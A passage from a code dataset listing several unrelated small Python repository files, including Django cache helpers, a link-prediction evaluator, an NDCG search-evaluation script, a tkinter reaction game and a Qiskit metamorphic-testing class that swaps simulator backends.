total_deviation_from_expected/maximum_total_deviation\n except ZeroDivisionError:\n return 0\n\nINTERESTING_GLOSSES = [(57,58),(146,459),(247,712),(344,611),(460,488),(494,495),(639,640),(649,650,651),(657,662)]\nPLACE_NORMALIZERS = {'Groningen': 23,'Amsterdam': 9,'St. Michielsgestel': 1,'Voorburg': 2.5}\ntotal_result = []\n\nfor variants in INTERESTING_GLOSSES:\n\n print('--')\n result = {place: {} for place in PLACE_NORMALIZERS.keys()}\n result_swapped = {}\n\n #Find regional numbers\n for variant in variants:\n\n result_swapped[variant] = {place: 0 for place in PLACE_NORMALIZERS.keys()}\n\n for place in PLACE_NORMALIZERS.keys():\n result[place][variant] = 0\n\n for freq in GlossFrequency.objects.filter(gloss__pk=variant):\n\n location = freq.speaker.location\n\n if location in PLACE_NORMALIZERS.keys():\n result[location][variant] += 1 # / PLACE_NORMALIZERS[location]\n result_swapped[variant][location] += 1 / PLACE_NORMALIZERS[location]\n\n #Translate to percentages\n perc_result = {}\n for place, freq_per_variant in result.items():\n\n nr_of_occurrences = sum(freq_per_variant.values())\n if nr_of_occurrences == 0:\n continue\n\n perc_result[place] = {}\n\n for variant, freq in freq_per_variant.items():\n perc_result[place][variant] = freq/nr_of_occurrences\n\n perc_result_swapped = {}\n regionality_scores = {}\n for variant, freq_per_place in result_swapped.items():\n\n nr_of_occurrences = sum(freq_per_place.values())\n if nr_of_occurrences == 0:\n continue\n\n perc_result_swapped[variant] = {}\n\n for place, freq in freq_per_place.items():\n perc_result_swapped[variant][place] = freq/nr_of_occurrences\n\n regionality_scores[variant] = regionality_score(perc_result_swapped[variant].values())\n\n print(perc_result)\n print(perc_result_swapped)\n print(regionality_scores)\n\n total_result.append(regionality_scores)\n\nprint(dumps(total_result))","repo_name":"Signbank/Global-signbank","sub_path":"signbank/interactive-article/region_distr.py","file_name":"region_distr.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"77"} +{"seq_id":"8061681870","text":"# -*- coding: utf-8 -*-\n# 2021-03-29 11:50\nimport json\n\nfilename = 'result.json'\n\n\ndef input_json_data_from_file( path ) :\n\t\"\"\"\n\tRead JSON data from a file\n\t:param path: path of the file\n\t:return json_data: the data converted to JSON format\n\t\"\"\"\n\ttry :\n\t\twith open( path , 'rb+' ) as f :\n\t\t\ttry :\n\t\t\t\tjson_data = json.load( f )\n\t\t\texcept Exception as e :\n\t\t\t\tprint( 'Invalid JSON format: ' + str( e ) )\n\t\treturn json_data\n\texcept Exception as e :\n\t\tprint( 'File does not exist: ' + str( e ) )\n\n\ndef analyze_json( jsons ) :\n\t\"\"\"\n\tParse the given jsons and print it as key-value pairs\n\t:param jsons: the JSON string to parse\n\t:return:\n\t\"\"\"\n\t# json_data = json.loads(jsons)\n\t# if isinstance(json_data, dict):\n\t# isinstance is a Python built-in that checks whether the jsons argument is of type dict\n\t# it returns True if so, otherwise False\n\tif isinstance( jsons , dict ) :\n\t\tfor key in jsons.keys() :\n\t\t\tkey_value = jsons.get( key )\n\t\t\tif isinstance( key_value , dict ) :\n\t\t\t\tanalyze_json( key_value )\n\t\t\telif isinstance( key_value , list ) :\n\t\t\t\tfor json_array in key_value :\n\t\t\t\t\tanalyze_json( json_array )\n\t\t\telse :\n\t\t\t\tprint( str( key ) + \" = \" + str( key_value ) )\n\telif isinstance( jsons , list ) :\n\t\tfor json_array in jsons :\n\t\t\tanalyze_json( json_array )\n\telse :\n\t\tprint( 'Please provide valid JSON data' )\n\n\ndef output_value( jsons , key ) :\n\t\"\"\"\n\tMatch the given key in jsons and print the corresponding value\n\t:param jsons: the JSON string to parse\n\t:param key: the key to look up\n\t:return:\n\t\"\"\"\n\tkey_value = ''\n\tif isinstance( jsons , dict ) :\n\t\tfor json_result in jsons.values() :\n\t\t\tif key in jsons.keys() :\n\t\t\t\tkey_value = jsons.get( key )\n\t\t\telse :\n\t\t\t\toutput_value( json_result , key )\n\telif isinstance( jsons , list ) :\n\t\tfor json_array in jsons :\n\t\t\toutput_value( json_array , key )\n\tif key_value != '' :\n\t\tprint( str( key ) + \" = \" + str( key_value ) )\n\n\ndef main( path ) :\n\tjson_data = input_json_data_from_file( path )\n\tprint( 'Original data: ' + str( json_data ) )\n\t\n\tprint( '……………………………………call analyze……………………………………' )\n\t# call analyze\n\tprint( 'The parsed result of jsons1 is as follows:' )\n\tanalyze_json( json_data )\n\t\n\tprint( '……………………………………call lookup……………………………………' )\n\t# call lookup\n\tprint( 'The value of t2key in jsons1 is as follows:' )\n\toutput_value( json_data , \"orderId\" )\n\tprint( '……………………………………finished……………………………………' )\n\n\nif __name__ == '__main__' :\n\tmain( rb\"result.json\" )","repo_name":"BecauseSummer/Python","sub_path":"Demo/demo10.py","file_name":"demo10.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9254134705","text":"import logging\n\nlogger = logging.getLogger(__name__)\n\n\ndef download_chunked(*, filefield, output_file):\n for data in filefield.storage.open(filefield.name).chunks(104857600):\n logger.info('Downloaded chunk of %s', filefield.name)\n output_file.write(data)\n logger.info('Done downloading chunked')\n","repo_name":"VeemsHQ/veems","sub_path":"veems/media/downloading.py","file_name":"downloading.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"77"} +{"seq_id":"28041186048","text":"import redis\nfrom django.core.cache import cache\nfrom django.shortcuts import get_object_or_404\nfrom django.http import Http404\nfrom django.shortcuts import reverse\n\ncache_time = 1\n\n\n\n\ndef cache_get_model_all(model):\n \"\"\"\n Get model all\n get_or_set cache\n\n \"\"\"\n\n return cache.get_or_set(\n f'{model._meta.model_name}_all',\n model.objects.all().order_by('site_name'),\n cache_time\n )\n\n\ndef cache_get_object_or_404(model, kwargs):\n \"\"\"\n Get object or 404\n get_or_set cache\n\n \"\"\"\n\n name = ','.join([f\"{key}={value}\" for key, value in kwargs.items()])\n return cache.get_or_set(\n f'{model._meta.model_name}_get_{name}',\n lambda: get_object_or_404(model, **kwargs),\n cache_time\n 
)\n\n\ndef cache_filter_model(model, kwargs):\n \"\"\"\n Model filter and sorted\n get_or_set cache\n \"\"\"\n\n name = ','.join([f\"{key}={value}\" for key, value in kwargs.items()])\n order_by_field = 'site_name' if model._meta.model_name != 'imagesproductsshop' else None\n\n queryset = model.objects.filter(**kwargs)\n\n if order_by_field:\n queryset = queryset.order_by(order_by_field)\n\n return cache.get_or_set(\n f'{model._meta.model_name}_filter_{name}',\n lambda: queryset,\n cache_time\n )\n\n\ndef annot(model):\n\n p = model.objects.select_related('group__category').all()\n from django.urls import reverse\n\n # Walk the queryset and build a URL for each object\n for product in p:\n product.url = reverse('shop:product', kwargs={\n 'slug_category': product.group.category.slug,\n 'slug_group': product.group.slug,\n 'slug': product.slug\n })\n\n return p\n\n\ndef cache_product_all_annot(model):\n\n cached_data = cache.get(f'{model._meta.model_name}_all_annot_url')\n\n if cached_data is not None:\n return cached_data\n data = annot(model)\n cache.set(f'{model._meta.model_name}_all_annot_url', data, cache_time)\n\n return data\n\n\ndef get_test_data(model=None):\n\n if not model:\n return cache.get('product_test_site_name')\n else:\n return cache.get_or_set(\n f'{model._meta.model_name}_test_site_name',\n lambda: model.objects.all().values_list('site_name', flat=True),\n cache_time\n )\n","repo_name":"Dmitrii-ru/shop","sub_path":"shop/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40392643848","text":"#!/usr/bin/python\n#-*- coding:utf-8 -*-\n\nimport logging\nimport datetime\nimport os\nimport sys\nfrom logging.handlers import RotatingFileHandler\nfrom PublicMethod import *\n\n\nclass Log(object):\n\n logger = None\n\n @classmethod\n def create_log_file(cls):\n logfile = '%s/%s.log' % (os.path.abspath('./log'),get_format_currenttime())\n\n cls.logger = logging.getLogger(__name__)\n cls.logger.setLevel(logging.DEBUG)\n\n # file handler\n filehandle = RotatingFileHandler(logfile, maxBytes=50*1024*1024, backupCount=5, encoding=\"UTF-8\")\n formatter = logging.Formatter('%(asctime)s : %(message)s')\n filehandle.setFormatter(formatter)\n cls.logger.addHandler(filehandle)\n\n # console handler\n console = logging.StreamHandler()\n formatter = logging.Formatter('%(asctime)s : %(message)s')\n console.setFormatter(formatter)\n cls.logger.addHandler(console)\n\nif __name__=='__main__':\n Log.create_log_file()\n Log.logger.debug('this is a debug msg')\n Log.logger.info('this is an info msg')\n","repo_name":"h080294/appium_python_android","sub_path":"common/Log.py","file_name":"Log.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"77"} +{"seq_id":"74091454968","text":"import torch\nimport matplotlib.pyplot as plt\n\nimgs = torch.load('imgs.pt')\nseg = torch.load('seg.pt')\npseg = torch.load('pseg.pt')\n\nprint(imgs[0][0].shape)\nprint(seg.shape)\nprint(pseg.shape)\n\n#gt1 = torch.argmax(pseg[0], dim=0).detach().cpu().numpy()\n#plt.imshow(gt1, cmap='gray')\n#plt.savefig(\"gt1.png\")","repo_name":"mtsysin/LaneDetection","sub_path":"segmentation_postprocess.py","file_name":"segmentation_postprocess.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39064343438","text":"# 
Write a Python program that finds the sum of the elements of an array of 1000000 integers.\r\n# example array: arr = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, ...]\r\n# the array must be filled with random integers from 1 to 100.\r\n# the task should be solved with multithreading, multiprocessing and asynchronous execution.\r\n# each solution must print the computation time.\r\n\r\nimport asyncio,time,random\r\n\r\nmassive=[random.randint(1, 100) for _ in range(1000000)]\r\nsum=0\r\nasync def summa(arr):\r\n global sum\r\n for i in arr:\r\n sum+=i\r\n\r\n\r\nif __name__=='__main__':\r\n\r\n start_time=time.time()\r\n tasks=[]\r\n for i in range(10):\r\n start_index=i*100000\r\n end_index=start_index+100000\r\n task =asyncio.ensure_future(summa(massive[start_index:end_index]))\r\n tasks.append(task)\r\n\r\n loop = asyncio.get_event_loop()\r\n loop.run_until_complete(asyncio.wait(tasks))\r\n print(f'async >>> {sum} time>>> {time.time()-start_time}')\r\n","repo_name":"AlexKri72/Flask","sub_path":"Lesson04/lesson04_8.py","file_name":"lesson04_8.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24891978842","text":"'''\na program for evaluating the quality of search algorithms using the vector model\n\nit runs over all queries in query.text and gets the top 10 results,\nand then qrels.text is used to compute the NDCG metric\n\nusage:\n python batch_eval.py index_file query.text qrels.text n\n\n output is the average NDCG over all the queries for boolean model and vector model respectively.\n\talso compute the p-value of the two ranking results. \n'''\n#import re\nimport scipy\nfrom scipy import stats\nimport cran\nimport metrics\nfrom cranqry import loadCranQry\nfrom index import InvertedIndex\nfrom query import *\n\n\ndef process_qrels_file(qrels_file,queries_id_list):\n qrels_dic={}\n f=open(qrels_file,'r').read()\n row=f.split(\"\\n\")\n #print(row)\n for x in row:\n if(x==''):\n break\n record=x.split(' ')\n quer_id=record[0]\n doc_id=record[1]\n if(quer_id in qrels_dic.keys()):\n qrels_dic[quer_id].append(doc_id)\n else:\n qrels_dic[quer_id]=[doc_id]\n #print(qrels_dic)\n #ignore the query_ids from qrels.text which are not in query.text\n #print(queries_id_list)\n #print(qrels_dic)\n #print(len(qrels_dic.keys()))\n #print(queries_id_list.__len__())\n temp_dict = dict()\n k=0\n for x in qrels_dic.keys():\n newkey=queries_id_list[k]\n temp_dict[newkey] = qrels_dic[x]\n k+=1\n #temp_dict=dict(qrels_dic)\n # for x in temp_dict.keys():\n # if x not in queries_id_list:\n # del qrels_dic[x]\n #print(temp_dict)\n return temp_dict\n\ndef eval(index_file,query_file,qrels_File,number_of_queries):\n #read queryfile,indexfile\n # ToDo\n queries = loadCranQry(query_file)\n queries_id_list=[str(int(x)) for x in queries.keys()]\n #print(queries_id_list)\n #read qrels.text\n qrels_dict=process_qrels_file(qrels_File,queries_id_list)\n inputdocument = cran.CranFile(\"cran.all\")\n # load the index file saved from part 1\n index = InvertedIndex().load(index_file)\n qp = QueryProcessor(queries, index, inputdocument, number_of_queries)\n queries_id_list_int=[int(x) for x in qrels_dict.keys()]\n queries_id_ls = [int(x) for x in queries.keys()]\n #IdeaVectorsforQuery_ids={}\n sumbooleanNADC=[]\n sumvectorNADC=[]\n with open('Evaluation_search.csv', 'w') as f:\n f.write(\"%s,%s,%s,%s\\n\" % (\"Iteration\", \"AverageNDCG-booleanModel\", \"AverageNDCG-vectorModel\",\"P-value\"))\n for i 
in range(0,5):\n vectorNADC=[]\n booleanNADC=[]\n intersection_queries=list(set(queries_id_list_int) & set(queries_id_ls))\n random_query_id_list = random.sample(queries_id_list_int, number_of_queries)\n #random_query_id_list=[153, 18]\n #print(random_query_id_list)\n for q_id in random_query_id_list:\n print(\"Processing for Query ID ::\",q_id)\n qp.querynumber=q_id\n #boolean_res=qp.booleanQuery()\n vector_top3=qp.vectorQuery(5)\n #vector_top3=[('12',0.34),('746',0.33),('875',0.24)]\n #print(boolean_res)\n print(\"Output for Vector Model Result::\",vector_top3)\n if(vector_top3.__len__()<1):\n vectorNADC.append(0)\n else:\n vector_label=[x[0] for x in vector_top3]\n score=[x[1] for x in vector_top3]\n print(\"DocumentIDs of Vector Model Result:: \",vector_label)\n print(\"Scores of Vector Model Result::\",score)\n true_label=vector_label.copy()\n query_id=str(q_id)\n for x in vector_label:\n #str_x=\"{0:0=3d}\".format(x)\n ind=vector_label.index(x)\n if (x in qrels_dict.get(query_id)):\n true_label[ind]=1\n else:\n true_label[ind]=0\n if true_label.__len__()<5:\n len_val=10-(true_label.__len__())\n true_label.extend([0]*len_val)\n print(\"Actual Vector:: \",true_label)\n print(\"Predicted Vector:: \",score)\n if sum(true_label)==0 :\n vectorNADC.append(0)\n else:\n ndcg=metrics.ndcg_score(true_label, score,5)\n print(\"Calculated ndcg for Vector::\",ndcg)\n vectorNADC.append(ndcg)\n boolean_res = qp.booleanQuery()\n print(\"output of boolean_res:: \",boolean_res)\n if boolean_res.__len__()<1:\n booleanNADC.append(0)\n else:\n score=[1]*len(boolean_res)\n if(score.__len__()<5):\n leng=5-(score.__len__())\n score.extend([0]*leng)\n true_label = boolean_res.copy()\n query_id = str(q_id)\n for x in boolean_res:\n ind = boolean_res.index(x)\n if (x in qrels_dict.get(query_id)):\n true_label[ind] = 1\n else:\n true_label[ind] = 0\n if true_label.__len__() < 5:\n len_val = 10 - (true_label.__len__())\n true_label.extend([0] * len_val)\n print(\"Actual boolean:: \", true_label)\n print(\"Predicted boolean:: \", score)\n if sum(true_label) == 0:\n booleanNADC.append(0)\n else:\n ndcg = metrics.ndcg_score(true_label, score, 5)\n print(\"Calculated ndcg for Boolean::\", ndcg)\n booleanNADC.append(ndcg)\n print(\"Calculated NADC sum for all queries\",vectorNADC)\n average_vectorNADC=float(sum(vectorNADC)/number_of_queries)\n print(\"Calculated NADC sum for all queries\",booleanNADC)\n average_booleanNADC=float(sum(booleanNADC)/number_of_queries)\n print(\"Average NADC Vector::\",average_vectorNADC)\n print(\"Average NADC boolean::\",average_booleanNADC)\n p_value=scipy.stats.wilcoxon(vectorNADC, booleanNADC, zero_method='wilcox', correction=False)\n print(i,str(average_booleanNADC),str(average_vectorNADC),str(p_value[1]))\n p=\"%.20f\" % float(str(p_value[1]))\n print('P value for all the queries processed is:',p)\n f.write(\"%s,%s,%s,%s\\n\" % (i+1, str(average_booleanNADC), str(average_vectorNADC),str(p)))\n print('Done')\n\nif __name__ == '__main__':\n #eval('index_file', 'query.text', 'qrels.text', 50)\n eval(str(sys.argv[1]), str(sys.argv[2]), str(sys.argv[3]), int(sys.argv[4]))\n #eval()\n","repo_name":"saisri09/Information_Retrivel","sub_path":"prj1/batch_eval.py","file_name":"batch_eval.py","file_ext":"py","file_size_in_byte":6568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20092373356","text":"import time\r\nimport os\r\nimport Initialize\r\nimport Evaluation_Indicators.AUC\r\n\r\n\r\nimport 
similarity_indicators.CommonNeighbor\r\nimport similarity_indicators.Jaccard\r\nimport similarity_indicators.PA\r\nimport similarity_indicators.AA\r\nimport similarity_indicators.HDI\r\nimport similarity_indicators.HPI\r\n\r\nimport similarity_indicators.Katz\r\nimport similarity_indicators.ACT\r\n\r\nstartTime = time.time_ns()\r\n#Initialize the training test set\r\n\r\nREADME1 = '''Please choose a DataSet:\r\n    WIKI        1\r\n    FACEBOOK    2\r\n    EMAIL-EU    3'''\r\n\r\nprint(README1)\r\nSet = int(input('Input Set:'))\r\nif Set == 1:\r\n NetFile = u'Data/WIKI.txt'\r\n NetName = 'WIKI'\r\nelif Set == 2:\r\n NetFile = u'Data/FACEBOOK.txt'\r\n NetName = 'FACEBOOK'\r\nelif Set == 3:\r\n NetFile = u'Data/EMAIL-EU.txt'\r\n NetName = 'EMAIL-EU'\r\nelse:\r\n print('Input Error')\r\n\r\nprint (\"\\nLink Prediction start:\\n\")\r\nTrainFile_Path = 'Data\\\\'+NetName+'\\\\Train.txt'\r\nif os.path.exists(TrainFile_Path):\r\n Train_File = 'Data\\\\'+NetName+'\\\\Train.txt'\r\n Test_File = 'Data\\\\'+NetName+'\\\\Test.txt'\r\n MatrixAdjacency_Train,MatrixAdjacency_Test,MaxNodeNum = Initialize.Init2(Test_File, Train_File)\r\nelse:\r\n MatrixAdjacency_Net,MaxNodeNum = Initialize.Init(NetFile)\r\n MatrixAdjacency_Train,MatrixAdjacency_Test = Initialize.Divide(NetFile, MatrixAdjacency_Net, MaxNodeNum,NetName)\r\n\r\n#Similarity matrix calculation\r\n\r\n# README = '''\\nPlease choose a method:\r\n# CN 0\r\n# Jaccard 1\r\n# PA 2\r\n# AA 3\r\n# Katz 4\r\n# ACT 5'''\r\n# print (README)\r\n# Method = int(input('Input Method:'))\r\n\r\n# Matrix_similarity = similarity_indicators.Cos.ACT(MatrixAdjacency_Train)\r\n\r\nprint('--------------------Node based similarity--------------------')\r\nprint('----------Common Neighborhood----------')\r\nMatrix_similarity = similarity_indicators.CommonNeighbor.Cn(MatrixAdjacency_Train)\r\nEvaluation_Indicators.AUC.Calculation_AUC(MatrixAdjacency_Train, MatrixAdjacency_Test, Matrix_similarity, MaxNodeNum)\r\nprint('----------Jaccard----------')\r\nMatrix_similarity = similarity_indicators.Jaccard.Jaccards(MatrixAdjacency_Train)\r\nEvaluation_Indicators.AUC.Calculation_AUC(MatrixAdjacency_Train, MatrixAdjacency_Test, Matrix_similarity, MaxNodeNum)\r\nprint('----------Preferential Attachment----------')\r\nMatrix_similarity = similarity_indicators.PA.PA(MatrixAdjacency_Train)\r\nEvaluation_Indicators.AUC.Calculation_AUC(MatrixAdjacency_Train, MatrixAdjacency_Test, Matrix_similarity, MaxNodeNum)\r\n#print('----------Adamic Adar----------')\r\n#Matrix_similarity = similarity_indicators.AA.AA(MatrixAdjacency_Train)\r\n#Evaluation_Indicators.AUC.Calculation_AUC(MatrixAdjacency_Train, MatrixAdjacency_Test, Matrix_similarity, MaxNodeNum)\r\nprint('----------HDI----------')\r\nMatrix_similarity = similarity_indicators.HDI.HDI(MatrixAdjacency_Train)\r\nEvaluation_Indicators.AUC.Calculation_AUC(MatrixAdjacency_Train, MatrixAdjacency_Test, Matrix_similarity, MaxNodeNum)\r\nprint('----------HPI----------')\r\nMatrix_similarity = similarity_indicators.HPI.HPI(MatrixAdjacency_Train)\r\nEvaluation_Indicators.AUC.Calculation_AUC(MatrixAdjacency_Train, MatrixAdjacency_Test, Matrix_similarity, MaxNodeNum)\r\nprint('--------------------Path based similarity--------------------')\r\nprint('----------Katz----------')\r\nMatrix_similarity = similarity_indicators.Katz.Katz(MatrixAdjacency_Train)\r\nEvaluation_Indicators.AUC.Calculation_AUC(MatrixAdjacency_Train, MatrixAdjacency_Test, Matrix_similarity, MaxNodeNum)\r\nprint('----------Commute Time----------')\r\nMatrix_similarity = 
similarity_indicators.ACT.ACT(MatrixAdjacency_Train)\r\nEvaluation_Indicators.AUC.Calculation_AUC(MatrixAdjacency_Train, MatrixAdjacency_Test, Matrix_similarity, MaxNodeNum)\r\n\r\n\r\n\r\nendTime = time.time_ns()\r\nprint(\"\\nRunTime: %f s\" % ((endTime - startTime) / 1e9))\r\n","repo_name":"Indaneboi/Link-Prediction","sub_path":"LinkPrediction.py","file_name":"LinkPrediction.py","file_ext":"py","file_size_in_byte":3837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"44024057881","text":"import requests\nimport json\nimport os\n\n\nclass RequestBuilder:\n def __init__(self, base_api, cache_dir=\"../data\"):\n self.CACHE_DIR = cache_dir\n self.BASE_API = base_api\n self.PWD = os.getcwd()\n\n def make_and_cache_request(\n self, endpoint: str, cache_name: str, overwrite: bool = False\n ) -> dict:\n\n cache = f\"{self.PWD}/{self.CACHE_DIR}/{cache_name}.json\"\n\n if os.path.isfile(cache) and not overwrite:\n print(f\"Reading from cache {cache}\")\n with open(cache, \"r\") as f:\n return json.load(f)\n\n else:\n print(f\"Saving and reading from response to {cache}\")\n\n try:\n req = f\"{self.BASE_API}{endpoint}\"\n res = requests.get(req)\n except:\n raise Exception(\"Invalid request\")\n\n try:\n with open(cache, \"w\") as f:\n json.dump(res.json(), f, ensure_ascii=False, indent=4)\n except:\n raise Exception(\"Unable to write to cache\")\n\n return res.json()\n","repo_name":"raviraina/pynhlstats","sub_path":"src/request_builder.py","file_name":"request_builder.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"6825325521","text":"'''\nName: Ronald Alberto Carrillo Garvin\nDate: 09-07-2022\nDescription: Program that calculates the means and standard deviation of a series of data stored in a flat file.\n'''\n\nimport math\ndatos1 = list()\ndatos2 = list()\n\ntry:\n archivo = open('datos.txt', mode='r', encoding='utf-8-sig')\n \n sumatoria = 0.0\n sumatoria2 = 0.0\n for linea in archivo:# Loop over each of the lists\n\n fila = linea.split(\" \")\n datos1.append(float(fila[0]))\n datos2.append(float(fila[1]))\n \n sumatoria += float(fila[0])\n sumatoria2 += float(fila[1])\n \n archivo.close()\n \n promedio = sumatoria / len(datos1)\n promedio2 = sumatoria2 / len(datos2)\n \n varianza = 0.0\n for i in range(len(datos1)):\n varianza += ((datos1[i]-promedio) * (datos1[i]-promedio))\n \n varianza2 = 0.0\n for i in range(len(datos1)):\n varianza2 += ((datos2[i]-promedio2) * (datos2[i]-promedio2))\n \n desviacion = math.sqrt(varianza/(len(datos1)-1))\n desviacion2 = math.sqrt(varianza2/(len(datos2)-1))\n \n print(\"--------------\")\n print(\"Mean - Std. Dev\")\n print(f\"{round(promedio,2)} {round(desviacion,2)}\")\n print(f\"{round(promedio2,2)} {round(desviacion2,2)}\")\n\nexcept ValueError:\n print(\"Error, a non-numeric value was entered.\")\nexcept FileNotFoundError:\n print(\"Error, the data file is not available.\")\nexcept ZeroDivisionError:\n print(\"Error, division by zero.\")\nexcept TypeError:\n print(\"Error in the data type.\")\nexcept IndexError:\n print(\"A column is missing to perform the calculations.\")\n","repo_name":"maosierra/pythonexamples","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20122286043","text":"import tkinter as tk\nimport random\nfrom datetime import datetime\nimport time\nimport math\n\n\ndef mouse_function(event):\n time.sleep(1)\n myCanvas.create_oval(randx, randy, randx + 100, randy + 100, fill='red')\n myCanvas.bind(\"<Button-1>\", mouse_function2)\n mouse_function.currenttime1 = datetime.now()\n\n\ndef mouse_function2(event):\n if event.x >= randx and event.y >= randy and event.x <= randx + 100 and event.y <= randy + 100:\n currenttime2 = datetime.now()\n\n print(\"time it took you to hit: \", currenttime2 - mouse_function.currenttime1)\n\n\nroot = tk.Tk()\nmyCanvas = tk.Canvas(root, bg=\"white\", height=300, width=300)\nmyCanvas.bind(\"<Button-1>\", mouse_function)\nsleep = random.randint(2,3)\nclickcount = 0\nstarttime = 0\nrandx = random.randint(0,200)\nrandy = random.randint(0,200)\n\n\nmyCanvas.pack()\n\n\nroot.mainloop()\n\n\n\n","repo_name":"mwaloszek55/Year2","sub_path":"Sem1/Programming/canvas.py","file_name":"canvas.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"17408401531","text":"import argparse\nfrom util import readData\nfrom kalman_filter import predict\nimport time\ndef main():\n parser = argparse.ArgumentParser(description='Robot Tracker')\n parser.add_argument('input_filename', type=str, help='input file name')\n parser.add_argument('-o', '-output_filename', type=str, default='prediction.txt', help='output file name')\n parser.add_argument('-v', '--visualize', type=bool, default=False, help='whether to visualize output')\n parser.add_argument('-t', '--test', type=bool, default=False, help='use the last 2 seconds of the file as a test and outputs predicted error')\n args = parser.parse_args()\n data = readData(args.input_filename)\n trainingData = data\n testData = None\n if args.test:\n # If in testing mode, we want to use the last 60 frames as test data\n trainingData = data[:-60]\n testData = data[len(data)-60:]\n predictions = predict(trainingData,args.visualize)\n assert len(predictions) == 60\n with open(args.o, 'w') as f:\n for element in predictions:\n f.write(\"%d,%d\\n\" % (element[0], element[1]))\n\n\n\nif __name__ == '__main__':\n #x = time.clock()\n main()\n #print time.clock() - x\n","repo_name":"vipergts24/CS8803_Final_Project","sub_path":"finalproject/finalproject.py","file_name":"finalproject.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"689032137","text":"import ast\nfrom copy import deepcopy\nfrom functools import reduce\nimport numpy as np\nimport re\nfrom typing import List, Tuple, Dict, Any\n\nfrom lib.mr import MetamorphicTransformation\n\nimport lib.metamorph as metamorph\nfrom lib.qfl import 
detect_divergence\n\n\nclass ChangeBackend(MetamorphicTransformation):\n\n def check_precondition(self, code_of_source: str) -> bool:\n return metamorph.check_get_backend(code_of_source)\n\n def is_semantically_equivalent(self) -> bool:\n return True\n\n def derive(self, code_of_source: str) -> str:\n \"\"\"Change the backend used in the source code.\n\n Args:\n source_code: The source code of the circuit.\n available_backends: available backends to use.\n\n Returns:\n The source code of the circuit with the backend changed.\n \"\"\"\n available_backends = self.mr_config[\"available_backends\"]\n sections = metamorph.get_sections(code_of_source)\n execution_section = sections[\"EXECUTION\"]\n mr_metadata = {}\n\n tree = ast.parse(execution_section)\n\n class BackendChanger(ast.NodeTransformer):\n\n def __init__(self, available_backends: List[str]):\n self.available_backends = deepcopy(available_backends)\n\n def visit_Call(self, node):\n if (isinstance(node, ast.Call) and\n isinstance(node.func, ast.Attribute) and\n node.func.attr == \"get_backend\" and\n isinstance(node.args[0], ast.Constant)):\n if node.args[0].value in self.available_backends:\n self.available_backends.remove(node.args[0].value)\n target_backend = np.random.choice(self.available_backends)\n print(f\"Follow: replace backend {node.args[0].value} -> \" +\n f\"{target_backend}\")\n mr_metadata[\"initial_backend\"] = str(node.args[0].value)\n mr_metadata[\"new_backend\"] = str(target_backend)\n node.args[0].value = target_backend\n return node\n\n backend_changer = BackendChanger(available_backends)\n modified_tree = backend_changer.visit(tree)\n changed_section = metamorph.to_code(modified_tree)\n sections[\"EXECUTION\"] = changed_section\n\n self.metadata = mr_metadata\n\n return metamorph.reconstruct_sections(sections)\n\n def check_output_relationship(\n self,\n result_a: Dict[str, int],\n result_b: Dict[str, int]) -> bool:\n \"\"\"Check that the two results are equivalent.\"\"\"\n exec_metadata = {\n \"res_A\": result_a,\n \"res_B\": result_b\n }\n detectors = self.detectors\n return detect_divergence(exec_metadata, detectors)\n","repo_name":"sola-st/MorphQ-Quantum-Qiskit-Testing-ICSE-23","sub_path":"lib/mr/change_backend.py","file_name":"change_backend.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"14118235703","text":"class Solution:\n def findRelativeRanks(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[str]\n \"\"\"\n if not nums:\n return []\n #newnums = sorted(list(set(nums)),reverse=True)\n #all the scores of athletes are guaranteed to be unique\n newnums = sorted(nums,reverse = True)\n dic = {}\n l = len(newnums)\n dic[newnums[0]] = \"Gold Medal\"\n if l>1:\n dic[newnums[1]] = \"Silver Medal\"\n if l>2:\n dic[newnums[2]] = \"Bronze Medal\" \n for i in range(3,len(newnums)):\n dic[newnums[i]] = str(i+1)\n res = [dic[k] for k in nums]\n return res","repo_name":"siyile/leetcode","sub_path":"src/UpTo550/Problem506.py","file_name":"Problem506.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"10987199441","text":"\nimport logging\n\n# ==============================================================================\n# The default logger root is used whenever the logging module's functions are\n# called directly.\n#\n# Define your own logger by creating an object of the Logger class.\n# 
